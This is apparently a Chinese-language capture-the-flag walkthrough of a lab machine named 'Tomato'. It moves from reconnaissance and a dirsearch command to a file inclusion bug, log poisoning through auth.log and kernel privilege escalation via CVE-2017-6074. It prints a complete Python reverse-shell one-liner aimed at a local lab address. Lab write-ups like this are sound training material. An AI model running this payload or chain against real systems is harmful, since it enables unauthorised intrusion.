Tomato

Tomato"/>

Tomato

信息收集

运行我们的bash脚本，发现目标系统开放了ftp和web服务

我们尝试是否可以匿名登录ftp，未果

我们访问web服务，发现是一个番茄图片，查看源码也没什么发现

我们fuzz一下路径，发现了存在一个antibot_image路径

dirsearch -u "http://192.168.101.197/" -e * -x404,500,403 -w /usr/share/seclists/Discovery/Web-Content/common.txt

我们发现存在一个info.php文件

文件的源码提示我们存在文件包含漏洞

我们验证漏洞确实是真实存在的

漏洞利用

我们尝试将一句话写进日志文件中，日志文件的路径为/var/log/auth.log，发现已被写入日志并成功执行我们的命令


那么我们就可以查找python是否存在，若存在则可以反弹shell到我们本地的机子上。可以看到python是存在的，并且版本为3.5

我们将执行如下的payload添加到cmd参数后获得一个shell

python3 -c 'import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.101.196",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"])'

提权

我们将linpeas.sh脚本上传到靶机上，并执行它

发现存在一个linux内核漏洞

我们发现这个内核漏洞对应的漏洞编号为CVE-2017-6074，我们将其编译变上传到靶机上，执行即root